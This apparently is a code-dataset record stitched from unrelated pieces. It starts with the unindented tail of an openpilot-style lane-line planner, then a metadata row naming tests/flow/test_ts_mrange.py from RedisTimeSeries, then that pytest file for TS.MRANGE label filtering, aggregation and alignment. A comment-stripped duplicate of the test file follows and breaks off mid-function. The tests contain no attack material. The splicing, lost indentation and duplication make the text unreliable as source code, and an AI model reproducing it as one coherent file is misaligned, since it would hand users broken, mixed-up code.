self.ll_t = np.zeros((TRAJECTORY_SIZE,))
self.ll_x = np.zeros((TRAJECTORY_SIZE,))
self.lll_y = np.zeros((TRAJECTORY_SIZE,))
self.rll_y = np.zeros((TRAJECTORY_SIZE,))
self.lane_width_estimate = FirstOrderFilter(3.7, 9.95, DT_MDL)
self.lane_width_certainty = FirstOrderFilter(1.0, 0.95, DT_MDL)
self.lane_width = 3.7
self.lll_prob = 0.
self.rll_prob = 0.
self.d_prob = 0.
self.lll_std = 0.
self.rll_std = 0.
self.l_lane_change_prob = 0.
self.r_lane_change_prob = 0.
self.camera_offset = -CAMERA_OFFSET if wide_camera else CAMERA_OFFSET
self.path_offset = -PATH_OFFSET if wide_camera else PATH_OFFSET
self.readings = []
self.frame = 0
self.wide_camera = wide_camera
def parse_model(self, md):
lane_lines = md.laneLines
if len(lane_lines) == 4 and len(lane_lines[0].t) == TRAJECTORY_SIZE:
self.ll_t = (np.array(lane_lines[1].t) + np.array(lane_lines[2].t))/2
self.ll_x = lane_lines[1].x
cameraOffset = ntune_common_get("cameraOffset") + 0.08 if self.wide_camera else ntune_common_get("cameraOffset")
self.lll_y = np.array(lane_lines[1].y) - cameraOffset
self.rll_y = np.array(lane_lines[2].y) - cameraOffset
self.lll_prob = md.laneLineProbs[1]
self.rll_prob = md.laneLineProbs[2]
self.lll_std = md.laneLineStds[1]
self.rll_std = md.laneLineStds[2]
desire_state = md.meta.desireState
if len(desire_state):
self.l_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeLeft]
self.r_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeRight]
def get_d_path(self, v_ego, path_t, path_xyz):
path_xyz[:, 1] -= self.path_offset
l_prob, r_prob = self.lll_prob, self.rll_prob
width_pts = self.rll_y - self.lll_y
prob_mods = []
for t_check in [0.0, 1.5, 3.0]:
width_at_t = interp(t_check * (v_ego + 7), self.ll_x, width_pts)
prob_mods.append(interp(width_at_t, [4.0, 5.0], [1.0, 0.0]))
mod = min(prob_mods)
l_prob *= mod
r_prob *= mod
l_std_mod = interp(self.lll_std, [.15, .3], [1.0, 0.0])
r_std_mod = interp(self.rll_std, [.15, .3], [1.0, 0.0])
l_prob *= l_std_mod
r_prob *= r_std_mod
if ENABLE_ZORROBYTE:
if l_prob > 0.5 and r_prob > 0.5:
self.frame += 1
if self.frame > 20:
self.frame = 0
current_lane_width = clip(abs(self.rll_y[0] - self.lll_y[0]), 2.5, 3.5)
self.readings.append(current_lane_width)
self.lane_width = mean(self.readings)
if len(self.readings) >= 30:
self.readings.pop(0)
if abs(self.rll_y[0] - self.lll_y[0]) > self.lane_width:
r_prob = r_prob / interp(l_prob, [0, 1], [1, 3])
else:
# Find current lanewidth
self.lane_width_certainty.update(l_prob * r_prob)
current_lane_width = abs(self.rll_y[0] - self.lll_y[0])
self.lane_width_estimate.update(current_lane_width)
speed_lane_width = interp(v_ego, [0., 31.], [2.8, 3.5])
self.lane_width = self.lane_width_certainty.x * self.lane_width_estimate.x + \
(1 - self.lane_width_certainty.x) * speed_lane_width
clipped_lane_width = min(4.0, self.lane_width)
path_from_left_lane = self.lll_y + clipped_lane_width / 2.0
path_from_right_lane = self.rll_y - clipped_lane_width / 2.0
self.d_prob = l_prob + r_prob - l_prob * r_prob
# neokii
if ENABLE_INC_LANE_PROB and self.d_prob > 0.65:
self.d_prob = min(self.d_prob * 1.3, 1.0)
lane_path_y = (l_prob * path_from_left_lane + r_prob * path_from_right_lane) / (l_prob + r_prob + 0.0001)
safe_idxs = np.isfinite(self.ll_t)
if safe_idxs[0]:
lane_path_y_interp = np.interp(path_t, self.ll_t[safe_idxs], lane_path_y[safe_idxs])
path_xyz[:,1] = self.d_prob * lane_path_y_interp + (1.0 - self.d_prob) * path_xyz[:,1]
else:
cloudlog.warning("Lateral mpc - NaNs in laneline times, ignoring")
return path_xyz
| true
| true
|
1c4233a81772cebc4ed4ece2d3a93645f94d10de
| 22,510
|
py
|
Python
|
tests/flow/test_ts_mrange.py
|
rostyboost/RedisTimeSeries
|
61b9db88ec00447ecd87583b60dbf7ad9394719d
|
[
"MIT",
"Ruby",
"BSD-3-Clause"
] | null | null | null |
tests/flow/test_ts_mrange.py
|
rostyboost/RedisTimeSeries
|
61b9db88ec00447ecd87583b60dbf7ad9394719d
|
[
"MIT",
"Ruby",
"BSD-3-Clause"
] | null | null | null |
tests/flow/test_ts_mrange.py
|
rostyboost/RedisTimeSeries
|
61b9db88ec00447ecd87583b60dbf7ad9394719d
|
[
"MIT",
"Ruby",
"BSD-3-Clause"
] | null | null | null |
import pytest
import redis
import time
from collections import defaultdict
from utils import Env, set_hertz
from test_helper_classes import _insert_data
from test_ts_range import build_expected_aligned_data
from includes import *
def test_mrange_with_expire_cmd():
env = Env()
set_hertz(env)
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command("TS.ADD", "X" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Y" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Z" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
current_ts = time.time()
assert r.execute_command("EXPIRE","X", 5)
assert r.execute_command("EXPIRE","Y", 6)
assert r.execute_command("EXPIRE","Z", 7)
while time.time() < (current_ts+10):
reply = r.execute_command('TS.mrange', '-', '+', 'FILTER', 'type=DELAYED')
assert(len(reply)>=0 and len(reply)<=3)
assert r.execute_command("PING")
def test_mrange_expire_issue549():
Env().skipOnDebugger()
env = Env()
set_hertz(env)
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('ts.add', 'k1', 1, 10, 'LABELS', 'l', '1') == 1
assert r.execute_command('ts.add', 'k2', 2, 20, 'LABELS', 'l', '1') == 2
assert r.execute_command('expire', 'k1', '1') == 1
for i in range(0, 5000):
assert env.getConnection().execute_command('ts.mrange - + aggregation avg 10 withlabels filter l=1') is not None
def test_range_by_labels():
start_ts = 1511885909
samples_count = 50
for mode in ["UNCOMPRESSED", "COMPRESSED"]:
env = Env()
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', mode, 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', mode, 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', mode, 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
expected_result.reverse()
actual_result = r.execute_command('TS.mrevrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
def build_expected(val, time_bucket):
return [[int(i - i % time_bucket), str(val).encode('ascii')] for i in
range(start_ts, start_ts + samples_count + 1, time_bucket)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'LAST', 5,
'FILTER', 'generation=x')
expected_result = [[b'tester1', [], build_expected(5, 5)],
[b'tester2', [], build_expected(15, 5)],
[b'tester3', [], build_expected(25, 5)],
]
env.assertEqual(sorted(expected_result), sorted(actual_result))
assert expected_result[1:] == sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count,
'AGGREGATION', 'LAST', 5, 'FILTER', 'generation=x',
'class!=middle'), key=lambda x:x[0])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'LAST', 5, 'FILTER', 'generation=x')
assert expected_result[0][2][:3] == sorted(actual_result, key=lambda x:x[0])[0][2]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 5,
'FILTER', 'generation=x')
assert [[1511885905, b'1']] == actual_result[0][2][:1]
assert expected_result[0][2][1:9] == actual_result[0][2][1:9]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'COUNT', 3, 'FILTER', 'generation=x')
assert 3 == len(actual_result[0][2]) # just checking that agg count before count works
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'COUNT', 3, 'FILTER', 'generation=x')
assert 3 == len(actual_result[0][2]) # just checking that agg count before count works
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'FILTER', 'generation=x')
assert 18 == len(actual_result[0][2]) # just checking that agg count before count works
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'invalid', 3,
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'AVG', 'string',
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 'string', 'FILTER',
'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+' ,'FILTER') # missing args
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+', 'RETLIF') # no filter word
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', 'string', start_ts + samples_count, 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, 'string', 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation+x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation!=x')
# issue 414
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,rudy,)')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,,rudy)')
# test SELECTED_LABELS
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'WITHLABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'SELECTED_LABELS', 'filter', 'k!=5')
env.flush()
def test_mrange_filterby():
start_ts = 1511885909
samples_count = 50
env = Env()
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", 1 ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", "a" ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 1, "a" ,'FILTER', 'name=bob')
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(samples_count)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(9, 12)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_TS', start_ts+9, start_ts+10, start_ts+11, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
def test_mrange_withlabels():
start_ts = 1511885909
samples_count = 50
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'class', b'middle'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'name', 'generation', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts + 1, start_ts + samples_count, 'WITHLABELS',
'AGGREGATION', 'COUNT', 1, 'FILTER', 'generation=x')
# assert the labels length is 3 (name,class,generation) for each of the returned time-series
try:
assert len(actual_result[0][1]) != 3 or len(actual_result[1][1]) != 3 or len(actual_result[2][1]) == 3
except Exception as ex:
print(str(actual_result))
res = r.execute_command('TS.INFO', 'tester1')
print(str(res))
res = r.execute_command('TS.INFO', 'tester2')
print(str(res))
res = r.execute_command('TS.INFO', 'tester3')
print(str(res))
raise ex
assert len(actual_result[0][1]) == 3
assert len(actual_result[1][1]) == 3
assert len(actual_result[2][1]) == 3
def test_multilabel_filter():
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
assert r.execute_command('TS.ADD', 'tester1', 0, 1) == 0
assert r.execute_command('TS.ADD', 'tester2', 0, 2) == 0
assert r.execute_command('TS.ADD', 'tester3', 0, 3) == 0
actual_result = r.execute_command('TS.mrange', '-', '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mrange', 0, '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)',
'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)', 'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
def test_large_key_value_pairs():
with Env().getClusterConnectionIfNeeded() as r:
number_series = 100
for i in range(0,number_series):
assert r.execute_command('TS.CREATE', 'ts-{}'.format(i), 'LABELS', 'baseAsset', '17049', 'counterAsset', '840', 'source', '1000', 'dataType', 'PRICE_TICK')
kv_label1 = 'baseAsset=(13830,10249,16019,10135,17049,10777,10138,11036,11292,15778,11043,10025,11436,12207,13359,10807,12216,11833,10170,10811,12864,12738,10053,11334,12487,12619,12364,13266,11219,15827,12374,11223,10071,12249,11097,14430,13282,16226,13667,11365,12261,12646,12650,12397,12785,13941,10231,16254,12159,15103)'
kv_label2 = 'counterAsset=(840)'
kv_label3 = 'source=(1000)'
kv_label4 = 'dataType=(PRICE_TICK)'
kv_labels = [kv_label1, kv_label2, kv_label3, kv_label4]
for kv_label in kv_labels:
res = r.execute_command('TS.MRANGE', '-', '+', 'FILTER', kv_label1)
assert len(res) == number_series
def ensure_replies_series_match(env,series_array_1, series_array_2):
for ts in series_array_1:
ts_name = ts[0]
ts_labels =ts[1]
ts_values =ts[2]
for comparison_ts in series_array_2:
comparison_ts_name = comparison_ts[0]
comparison_ts_labels =comparison_ts[1]
comparison_ts_values =comparison_ts[2]
if ts_name == comparison_ts_name:
env.assertEqual(ts_labels,comparison_ts_labels)
env.assertEqual(ts_values,comparison_ts_values)
def test_non_local_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
# ensure that initiating the query on different shards always replies with the same series
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
# ensure that initiating the query on different shards always replies with the same series
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
# send undordered timestamps to test for sorting
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 11 5 25 55 101 18 9 1900 2 FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
# ensure reply is properly filtered by TS
for serie in actual_result:
serie_ts = serie[2]
# ensure only timestamp 2 is present on reply
env.assertEqual(len(serie_ts),1)
env.assertEqual(serie_ts[0][0],2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_labels():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu', '')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
# ensure that initiating the query on different shards always replies with the same series
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 2 SELECTED_LABELS metric FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_mrange_align():
start_ts = 1511885909
samples_count = 50
with Env(decodeResponses=True).getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
end_ts = start_ts + samples_count
agg_bucket_size = 15
expected_start_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
]
expected_end_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
]
assert expected_start_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
assert expected_end_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
def groupby(data):
result = defaultdict(lambda: 0)
for key, labels, samples in data:
for sample in samples:
result[sample[0]] = max(result[sample[0]], int(sample[1]))
return [[s[0], str(s[1])] for s in result.items()]
expected_groupby_start_result = [['generation=x', [], groupby(expected_start_result)]]
expected_groupby_end_result = [['generation=x', [], groupby(expected_end_result)]]
assert expected_groupby_start_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
assert expected_groupby_end_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
| 61.00271
| 333
| 0.609329
|
import pytest
import redis
import time
from collections import defaultdict
from utils import Env, set_hertz
from test_helper_classes import _insert_data
from test_ts_range import build_expected_aligned_data
from includes import *
def test_mrange_with_expire_cmd():
env = Env()
set_hertz(env)
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command("TS.ADD", "X" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Y" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Z" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
current_ts = time.time()
assert r.execute_command("EXPIRE","X", 5)
assert r.execute_command("EXPIRE","Y", 6)
assert r.execute_command("EXPIRE","Z", 7)
while time.time() < (current_ts+10):
reply = r.execute_command('TS.mrange', '-', '+', 'FILTER', 'type=DELAYED')
assert(len(reply)>=0 and len(reply)<=3)
assert r.execute_command("PING")
def test_mrange_expire_issue549():
Env().skipOnDebugger()
env = Env()
set_hertz(env)
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('ts.add', 'k1', 1, 10, 'LABELS', 'l', '1') == 1
assert r.execute_command('ts.add', 'k2', 2, 20, 'LABELS', 'l', '1') == 2
assert r.execute_command('expire', 'k1', '1') == 1
for i in range(0, 5000):
assert env.getConnection().execute_command('ts.mrange - + aggregation avg 10 withlabels filter l=1') is not None
def test_range_by_labels():
start_ts = 1511885909
samples_count = 50
for mode in ["UNCOMPRESSED", "COMPRESSED"]:
env = Env()
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', mode, 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', mode, 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', mode, 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
expected_result.reverse()
actual_result = r.execute_command('TS.mrevrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
def build_expected(val, time_bucket):
return [[int(i - i % time_bucket), str(val).encode('ascii')] for i in
range(start_ts, start_ts + samples_count + 1, time_bucket)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'LAST', 5,
'FILTER', 'generation=x')
expected_result = [[b'tester1', [], build_expected(5, 5)],
[b'tester2', [], build_expected(15, 5)],
[b'tester3', [], build_expected(25, 5)],
]
env.assertEqual(sorted(expected_result), sorted(actual_result))
assert expected_result[1:] == sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count,
'AGGREGATION', 'LAST', 5, 'FILTER', 'generation=x',
'class!=middle'), key=lambda x:x[0])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'LAST', 5, 'FILTER', 'generation=x')
assert expected_result[0][2][:3] == sorted(actual_result, key=lambda x:x[0])[0][2]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 5,
'FILTER', 'generation=x')
assert [[1511885905, b'1']] == actual_result[0][2][:1]
assert expected_result[0][2][1:9] == actual_result[0][2][1:9]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'COUNT', 3, 'FILTER', 'generation=x')
assert 3 == len(actual_result[0][2])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'COUNT', 3, 'FILTER', 'generation=x')
assert 3 == len(actual_result[0][2])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'FILTER', 'generation=x')
assert 18 == len(actual_result[0][2])
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'invalid', 3,
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'AVG', 'string',
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 'string', 'FILTER',
'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+' ,'FILTER')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+', 'RETLIF')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', 'string', start_ts + samples_count, 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, 'string', 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation+x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation!=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,rudy,)')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,,rudy)')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'WITHLABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'SELECTED_LABELS', 'filter', 'k!=5')
env.flush()
def test_mrange_filterby():
start_ts = 1511885909
samples_count = 50
env = Env()
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
